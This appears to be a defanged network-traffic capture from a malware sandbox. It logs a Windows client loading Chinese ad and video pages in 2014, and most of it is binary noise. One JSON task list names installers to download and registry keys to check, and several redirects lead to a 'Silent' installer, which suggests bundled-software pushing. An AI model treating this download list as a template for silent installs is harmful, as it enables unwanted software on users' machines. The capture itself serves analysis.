Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: eiv.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Content-Type: image/gif
ETag: "762990053"
Accept-Ranges: bytes
Last-Modified: Tue, 13 Apr 2010 09:38:40 GMT
Expires: Sun, 21 Apr 2024 17:29:06 GMT
Cache-Control: max-age=311040000
Content-Length: 1119
Date: Fri, 13 Jun 2014 17:29:06 GMT
Server: BWS/1.0
Connection: Keep-Alive
GIF89a........s..E.....M...................ZS.2-.YS.......2,.c[..D....
...0'..:..0.&..]Z..8..>..D.TM.................C................._..
^.....u..w........~........k.4......X..d.......=1.....a.c[.PH.h_.....b
..........PH........A..9....h`..J..1.......g`..W........2........z.#..
.p..m....jd........*.............[Q...........6..G..............6..t..
........... ..TL.....!....$....."..;0.....h.7-..............Z.........
....%..:.....H@....^W.QJ..'. !..........70.._. %.'...T.0'..Q.G?.ws....
-$........h.}w.....>...........L.....#.......:0.............\S.....
........*".....Q..............<..T.!...p.$...}........N..........d_
...........j.......VN.....o.....e........[............................
......................................................................
....................!.......,............u...,..>6.T.T..&T.".H. ...
.3^.PQ.G..:^..H.-.T....2#!........K..iP.&..03%X..x.P/^.$...`...G>Xd
....!..d.T...j.,..fQ..8l<..U%..G|.h.......$p..f......R..b.....*R@W"
2y..8..V3.LV`t.e..7.>.........\D..O.H.....$...^.]..).. ...9..E...d\
...V.U1..i......B]......c.P<0.i...v.]D..G .?p-.CD.Fi;>..v....r`.
.&........./.dp....`.....;HTTP/1.1 200 OK..Content-Type: image/gif..ET
ag: "762990053"..Accept-Ranges: bytes..Last-Modified: Tue, 13 Apr 2010
 09:38:40 GMT..Expires: Sun, 21 Apr 2024 17:29:06 GMT..Cache-Control: 
max-age=311040000..Content-Length: 1119..Date: Fri, 13 Jun 2014 17:29:
06 GMT..Server: BWS/1.0..Connection: Keep-Alive..GIF89a........s..E...
..M...................ZS.2-.YS.......2,.c[..D.......0'..:..0.&..]Z
<<< skipped >>>


GET /x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.quzhao.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 28 Apr 2014 12:03:26 GMT
Accept-Ranges: bytes
ETag: "07b45dcd962cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:31 GMT
Content-Length: 886
...........U.n.4.}>...........t... 1-.......*..L|..9.../...$...9...
/.K..=.$.h.b..Z{..w..{W./...\C...n....'.@.._'....W....O_C.F.T.n...&%..
[email protected](../..{..[p..t..2....h.2...n.?..'......0...&`O...Fl3.....
[email protected]..).....l..`..[.-t.........0.~g.....P<[email protected]../y[p.
.h...w.....3..d.....[..R.R(.c.F.R%[email protected]....}5.S.:#.
....q....N0]dhtit.\...<....z.2..m...1.a...]....j..S....4...........
r..MV..b...3.....r....C K.....L.).L,.BE.Z...Mj"S4..e..s..|N{:J"s...d..
.|[email protected]_.OL...O4...7dK|....$.^...o?.....6...G[..6J...
..M|..........a...uG.:..... "...D..RY. ..L.7....W.c.k..4....t...8.J{..
G:....h0~..Y...s....3.^.p....v?...1.....?.ap./.\..nl...o..x.)...4../&.
I_.&=?....E}.....}Q.D..0.6%.OkYs...Y.V.......ZRY..ggNN.".2`.n*3.a))..P
.tG...@.>i.t.i...s...r...g....4...$..w..^>..... ..s.0..$..8.G9..
..x.....l.s..Q......y.D..IrmRv...:?............1?>.}.........>....


GET /x/mnh/mini/q428/8.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.quzhao.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Content-Encoding: gzip
Last-Modified: Mon, 28 Apr 2014 12:03:25 GMT
Accept-Ranges: bytes
ETag: "80e4acdbd962cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:32 GMT
Content-Length: 559
...........S.n.0.}.......D1$...MS.}...l.....N......4....%.=>..{....
3V8.tve.=.........s.......*.U..5.6...#(..k.9.c.....Yb...."..RP......q.
."..m...(...D .".....0.z....A.......BKm.b.._.J.\T... E?..L1...`...B...
E{b......9..cT.8V..l.%.h-......o...x..X...w.M..=G..z........n.A.*..t..
.e[..,q<&9h.....h,...L..[...v...}_.j(..I6jO.w...........-%.B.....\.
..QO.#....JAu........%x.]D.....PN....'E3Y.....]h#wi..........V.e.4...B
q.L.[..>......6~x...HQk2.Z....w....".l.......s[.......d...d,..,K.G.
&..._......NM;}:7q2..\............N...M..l...~...{.`...2....~..;.l....
..E>........


GET /x/mnh/mini/q428/mnh_428cc.html HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.quzhao.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 28 Apr 2014 12:03:26 GMT
Accept-Ranges: bytes
ETag: "07b45dcd962cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:32 GMT
Content-Length: 2129
...........X.o.......?..ADZ_(.ijG....Zcq.%...q. [email protected]........
[.....).fA....%......(.. 'm.aJ`.w...}.......V^^^.. gI=h8....pnu.....hv
Y.W.W.._Z_;G.B....m.........).. h...N.S...<..._....@.|..1d..T....B.
b...-s..c~~^..0g..n...... m{.....p7..o79%.x3i.........o..l....%:......
....'.rl.2...jR..*7l....%>wL......s.P..Rr.P ...|....^g[L."...j.....
......}1.m..^.g.5.F.NN..l1.\.>.n..\.V....F.........fVS....xrsZ...ZL
......V=9....W.Q.....rKm2.\Vp<..y..g.U.40FAdh.F..067.=|...K\._>.
...z.....q..L3.v .j...Y.........]..iW....].ZIL.O..b6r6D^.{..z.'...7..n
........}..h...n...1...U..Z.mq...t...>............zo},.c.......b...
*..f...n-....b...#.B.I ,...z..x......M..Z....wz....x}.._...v..G.....A.
...hF.*..3...*d....d..1M..*J.........1...... ........w. ...g...._.....
..%...j8DL..5...,.#..|.s....,A.&. .!e...#..../...F|..U.t..0MC.!LtE...E
.\./..U.k........y.u.n..........m..rF.3..X....^>53W...d............
../.........~..{...J.g..g.~..../....../?O.g..O.|....w~.....?.).?5.....
......z7.?........y..w..........o....=_............}...c.....y........
~...........X...w..................... ./.`....\......^...V..g..x.Z.T!
<(UTx...v.*U_.!.."<K.......vNhT...I.......h..j..e.&.I.S8...J....
...-........00[..v......<.....o{..#Fo...y.m.....p.....G.t.[.......#
...QY...ME.n7...5.......95}....b.(A)7.......Y". X.,-.^...p.......eK...
.....!..I1u4.<..4.-..LE...=..)3..aMO.M.D@....&'@.pY.8WX;....~....9r
.R...p e....I..2...O0|q...P...g.jf'.E.&....G.'..rb.Tr...;T[h5.;....xA.
.8....Q..k^e....I......b.[....{.X.k......r..=N....mB....6j...xb...
<<< skipped >>>

GET /x/mnh/mini/q428/css_mini.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.quzhao.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Content-Encoding: gzip
Last-Modified: Mon, 28 Apr 2014 12:03:29 GMT
Accept-Ranges: bytes
ETag: "803efded962cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:33 GMT
Content-Length: 1249
...........VM..4.^wK}..#..Q.*?....6...-'q*V..(qMwMT.......i..7`.%...t.
 ...;....a.R*%.......i...D.\.Yb./...........,...J........$.;L.....w.o.
~..w..YD.-.'..F|.0.q..myn..-....F7.....R..$.._......aO&.O.I.LRw.z.t^.M
..-..A .BZ.../t.........A~F..$. .T"..r!.P....m........(o=...Cw..QD..0.
.I`....3..0 q.. !...e..O..T...d.vF....T...]...4.w...1K..b-2.".M.?_._.f
B....8F...U..D...u.SFs.uW...[....4e,.g3..)...e...fp....T.2..:.N.8.j.{.
0..rl.c..h..e......... O..V,.._h!.....b......KP.$<......qW......2Fw
..k.n9..zl.S....Q.......6...Q....2_.........7.9..Z.....N.....5\.....XM
.6B..2'....^...n.......6.5g.4GY.Q..^.....[i<..1..d.GE>....."..&l
t;....'......h...?J.\...*.......!{".`.#ci.Q..{.l.H\.p..=.GC.H6d.......
..(s.U'.t..`.....y...j;R.. .%z.....y.m.~...S{..o....N..9.........#..i.
`......?.......~...._......^.....7_....._...g......g$O.S.....'K.JuSH.6
.#..M....l....I..X0.l....;........ .Y.?.(......r{8d=.t...m`O@e.\5..O..
8.bX..3.......,.. ..0. -.\. ...`3..*...[.7.43........wA7.W.U.m|..3.:..
.,3.9...:H..^.......d..Q}..q....#.....].]...2..:.{......H.Jg..u..3}j..
/x;6D....(X.8..A.*u...}S^Qz.....d....R.p..\.a......ul..Q.M...`..D/~w.0
\...F.3.....W.l....;..8...3........{sg5F...:............Q.....1ZisY..C
.q.S..,?.Szf..l........q...f0.....H..)...m..f...M.:........z..........
.....
<<< skipped >>>

GET /x/mnh/mini/q428/mini_mnh_428.html?1?id=0 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mnh.quzhao.com
Connection: Keep-Alive
Cookie: Hm_lvt_d1117fa0662883e59acd91ed0f03b7eb=1402680551; Hm_lpvt_d1117fa0662883e59acd91ed0f03b7eb=1402680551


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 28 Apr 2014 12:03:26 GMT
Accept-Ranges: bytes
ETag: "07b45dcd962cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:29:06 GMT
Content-Length: 886
...........U.n.4.}>...........t... 1-.......*..L|..9.../...$...9...
/.K..=.$.h.b..Z{..w..{W./...\C...n....'.@.._'....W....O_C.F.T.n...&%..
[email protected](../..{..[p..t..2....h.2...n.?..'......0...&`O...Fl3.....
[email protected]..).....l..`..[.-t.........0.~g.....P<[email protected]../y[p.
.h...w.....3..d.....[..R.R(.c.F.R%[email protected]....}5.S.:#.
....q....N0]dhtit.\...<....z.2..m...1.a...]....j..S....4...........
r..MV..b...3.....r....C K.....L.).L,.BE.Z...Mj"S4..e..s..|N{:J"s...d..
.|[email protected]_.OL...O4...7dK|....$.^...o?.....6...G[..6J...
..M|..........a...uG.:..... "...D..RY. ..L.7....W.c.k..4....t...8.J{..
G:....h0~..Y...s....3.^.p....v?...1.....?.ap./.\..nl...o..x.)...4../&.
I_.&=?....E}.....}Q.D..0.6%.OkYs...Y.V.......ZRY..ggNN.".2`.n*3.a))..P
.tG...@.>i.t.i...s...r...g....4...$..w..^>..... ..s.0..$..8.G9..
..x.....l.s..Q......y.D..IrmRv...:?............1?>.}.........HTTP/1
.1 200 OK..Cache-Control: max-age=86400..Content-Type: text/html..Cont
ent-Encoding: gzip..Last-Modified: Mon, 28 Apr 2014 12:03:26 GMT..Acce
pt-Ranges: bytes..ETag: "07b45dcd962cf1:0"..Vary: Accept-Encoding..Ser
ver: Microsoft-IIS/7.5..Date: Fri, 13 Jun 2014 17:29:06 GMT..Content-L
ength: 886.............U.n.4.}>...........t... 1-.......*..L|..9...
/...$...9.../.K..=.$.h.b..Z{..w..{W./...\C...n....'.@.._'....W....O_C.
F.T.n...&%[email protected](../..{..[p..t..2....h.2...n.?..'......0...&`
[email protected]..).....l..`..[.-t.........0.~g.....P<..8.m
[email protected]../y[p..h...w.....3..d.....[..R.R(.c.F.R%K.XK...-............
<<< skipped >>>


GET /json/task/task.js HTTP/1.1
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: web.mny8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 12 Jun 2014 03:25:32 GMT
Accept-Ranges: bytes
ETag: "a46ee5f7ed85cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 13 Jun 2014 17:28:09 GMT
Content-Length: 1499
{"json":[{"id":"17","name":"\u70b9\u5fc3\u8f93\u5165\u6cd5","type":"1"
,"num":"100","description":"\u53ea\u4e13\u6ce8\u4e8e\u201c\u8f93\u5165
\u201d\u7684\u5168\u65b0\u7248\u672c\u8f93\u5165\u6cd5\u3002\u8be5\u8f
93\u5165\u6cd5\u4e0d\u4ec5\u6709\u5b89\u88c5\u5305\u5c0f\u3001\u901f\u
5ea6\u5feb\u7684\u7279\u70b9\uff0c\u5e76\u4e14\u65e0\u5f39\u7a97\u3001
\u65e0\u5e7f\u544a","url":"hXXp://dianxinshu.92ttz.com/download/setup_
s3344.exe|setup_s3344.exe","keyword":"HKEY_LOCAL_MACHINE\\SOFTWARE\\uu
see111\\","imgurl":"/TaskImg/2014612112552104.png","status":"1"},{"id"
:"13","name":"\u0033\u0036\u0030\u5b89\u5168\u5957\u88c5","type":"1","
num":"100","description":"\u6740\u6bd2\u002c\u6728\u9a6c\u9632\u706b\u
5899\u002c\u7f51\u76fe\u53ca\u5b89\u5168\u4fdd\u9556\u5408\u56db\u4e3a
\u4e00\u002c\u6781\u9650\u5b89\u5168\u4fdd\u969c\u3002","url":"hXXp://
dl.360safe.com/p/Setup_oemqd20.exe|Setup_oemqd20.exe","keyword":"HKEY_
CURRENT_USER\\Software\\360SoftMgr11\\","imgurl":"/TaskImg/20143261645
15208.png","status":"1"},{"id":"5","name":"\u0050\u0050\u0054\u0056\u6
4ad\u653e\u5668","type":"1","num":"100","description":"\u6700\u6d41\u7
545\u7684\u7f51\u7edc\u89c6\u9891\u002c\u5728\u7ebf\u004e\u0042\u0041\
u76f4\u64ad\u3001\u82f1\u8d85\u76f4\u64ad\u3001\u9ad8\u6e05\u7535\u5f7
1\u3001\u7535\u89c6\u5267\u5728\u7ebf\u89c2\u770b","url":"hXXp://downl
oad.pplive.com/PPTV_forqd1454.exe|PPTV_forqd1454.exe","keyword":"HKEY_
LOCAL_MACHINE\\SOFTWARE\\Lenovo\\pptv111\\","imgurl":"/TaskImg/2014225
22565660.png","status":"1"}]}..
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=15728640-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /xvideo/xvideo15s140529.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.m0wscdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 29 May 2014 09:43:14 GMT
ETag: "53870132-22eb3"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
X-Via-Cache: sx
Content-Length: 143027
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 03:20:32 GMT
Age: 136882
Connection: keep-alive
X-cdn: ydcdn
X-hit-at: sx
...P?.....]....Ik...0..W...1....K.|.a4`*K.P...s..q.x...,...O5t......D.
I. .:......`/}1=....N[.....:|.k.....{..{k.n.P`..M.."...k]...i.......H.
.p_....48.. ..XT.......Tl.m7.. UT....^.v>.........L..=H...M.wTG.^wu
............Y..*..u.n<k...Z......:....GL.....i...^0..K.e...\..&..e.
.5...|..f.E..{...9z.?.......vL........I../.Ah......i...6O..[.........d
... ]2....3...U....b.......:.[.....^...-xc..=}ETs.1g.9.. .\.r...5.=...
.F.N..v{......8...u..Z...H..QQ.A.d.8.h......*@..J...f}N*...s.... .ZF.O
.3.3;.WdMl....V......... .fvy5..'...........ab..q....p../...C.%.... .J
^....Y"0.q...U.H.on.t.f.R.p.3E....@=S......%WX.........Ax.....^.q....&
gt;..<.........&...h .]Pw.....B..^'..-E..9n:}N ...YL..%....~}......
nX.......V.y.}o...<....k..f8o`.Ib$Fe!179.egP............F3...q..E.C
....v.....RTg.<V.a.....}o..#.........AQ.......AP5.H.Dt...M...</.
[."..Q`.a....YT....Om.j..])..$A.q.);.va4C....Bw...... D....>....,.1
S........{.:]...w_x.\..e..<.:1C.;.zp..=qP....H........U.|.C.u..^J..
........_&..=...,..4.f....l...fi .2.iG.hG...T7./.:. .IU.#)...-Z{.A.b.J
..Uy...#.r.......2..,.............$G.*.[..S....6...."...9..>..e..~W
....J..*._V......!...E.....8!.8.......kQ....]..N.7.N..M*Q.....eMe..v.'
.....r...... %.r....o..../.6.M.......4.....K...$.7..R...v....!):..' .D
 .ns..g.n..JP.F.0..^...I..<}G..0..W....G.Fg.q....g.x.......=*.9...B
.....(}):[email protected]"f.....a3S..E.=.8.....w...x..;.L..t.M~.c
UQ...n.....]..H...<~.>.......=.......w.}...A.....e.../..../....U
./...Jh.k^?..rm..i{...o......J'11a.-...x..SP.WO.Y.`....8. P#.U q..
<<< skipped >>>


GET /media/v1/0f000KLx1mYZLI-ed9V_os.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:36 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 18857
Cache-Control: max-age=31536000
Expires: Sat, 27 Dec 2014 06:06:09 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
......JFIF.............C..............................................
......................C...............................................
........................,.h.."........................................
.M............................!"12.#ABQRabqr..3C....$S....Mcs.......
.Te.....................................A.........................!.."
1Q.2Aaq....#3BRr....b....$....CS..............?...."...." ...""...." .
..""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""
...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""....
" ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ..
.""...." ...""...." ...""...." ...""...." ...""...." ...$..ZW......n..
p.a...qn-....Uq...W.............,...1L.....n....8.2[......<.......'
u<X.D.z|N.1Sm.|S..." ...""...." ...""...." ...""...." ...""...." ..
./.......@~bT.K..z.../V....n...co.....x.....~Sf.ij].4-.........T\.....
A^y.....8o.....c=)..^...j^&<.......#<.=Z...#....D../.....WZ.....
...[.,.n.)k..?I.Z.V$.._.#.....F....U.L.Q.......~m.....EN9`........yO..
b>o._...0.....4wl.N.23..6._...T....]fr. ....2BKdLN.KEl.....G...=)cg
..2.x.Pc."s.U.....1.....X.b....a.7x.og. .1|..... B{9Z-........5f/DE{..
.}0OaE.].."..5t....t2.....q..y.......v`.#.cu]o./X.8....T....,......|DE
..........H@.?...u...q...'..,vl.R..c...1......~.Y.1xc{..&.*........~.Z
....-.3..t..ia...:..|.m.%..X...}......." ...""...." ...""...." ...""..
. >...v.L;..H^X.l.5.....0.;..y......f....m.r....(H....r...Z{C..^9WM
5D.W..>.n....G?F...Z....(..&..3..g.....ok..Nw.....8.5...xV<.
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=15597568-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /livevideo/v3.11.67/styles/mini.css HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 07:39:12 GMT
Date: Thu, 05 Jun 2014 07:39:12 GMT
Server: pws/1.4.2.9
Content-Type: text/css
Content-Length: 1612
Last-Modified: Thu, 05 Jun 2014 05:10:04 GMT
ETag: "538ffbac-64c"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx37:8104 (Cdn Cache Server V2.0), 1.1 dls20:10 (Cdn Cache Server V2.0)
Connection: keep-alive
*{margin:0;padding:0;}body{background:url(../images/mini/bg.jpg) repea
t;min-width:0;}ul{list-style:none;}#content{width:960px;position:relat
ive;margin:0 auto;overflow:hidden;height:530px;}#player-wrap{width:703
px;float:left;background:black;height:530px;margin-right:4px;}#channel
-list-wrap{float:left;width:252px;height:530px;}#channel-list-nav{heig
ht:30px;}.channel-list-item{display:block;text-align:center;width:62px
;height:28px;float:left;vertical-align:middle;background:url(../images
/mini/mini.png) no-repeat;font:16px "............";color:#b2b2b2;paddi
ng-top:5px;margin-right:1px;cursor:pointer;}.channel-list-item:hover{c
olor:white;}.channel-list-item.press{color:white;background-position:-
62px 0;}.channel-list{clear:both;height:500px;overflow-y:auto;overflow
-x:hidden;position:relative;}.channel-item{border-bottom:1px dotted #2
22;padding:11px 12px 11px 20px;color:#9e9e9e;font-size:12px;clear:both
;position:relative;cursor:pointer;}.channel-item:hover{background:#1a1
a1a;}.channel-item.press{color:#1d60bf;font-weight:bold;}.channel-item
.press .play-icon{display:inline-block;}.play-icon{width:16px;height:1
6px;background:url(../images/mini/mini.png) no-repeat -124px 0;display
:none;position:absolute;top:10px;left:1px;}.channel-name{display:inlin
e-block;text-overflow:ellipsis;overflow:hidden;white-space:nowrap;max-
width:144px;float:left;}.online-num{position:absolute;top:14px;right:1
0px;padding-left:12px;height:12px;line-height:12px;background:url(../i
mages/mini/mini.png) no-repeat -124px -16px;color:#9E9E9E;font-wei
<<< skipped >>>

GET /livevideo/v3.11.67/images/mini/mini.png HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 07:39:13 GMT
Date: Thu, 05 Jun 2014 07:39:13 GMT
Server: pws/1.4.2.9
Content-Type: image/png
Content-Length: 1065
Last-Modified: Thu, 05 Jun 2014 05:10:07 GMT
ETag: "538ffbaf-429"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 lz149:8105 (Cdn Cache Server V2.0), 1.1 dls19:9 (Cdn Cache Server V2.0)
Connection: keep-alive
.PNG........IHDR.......!.....<..<....PLTE.......................
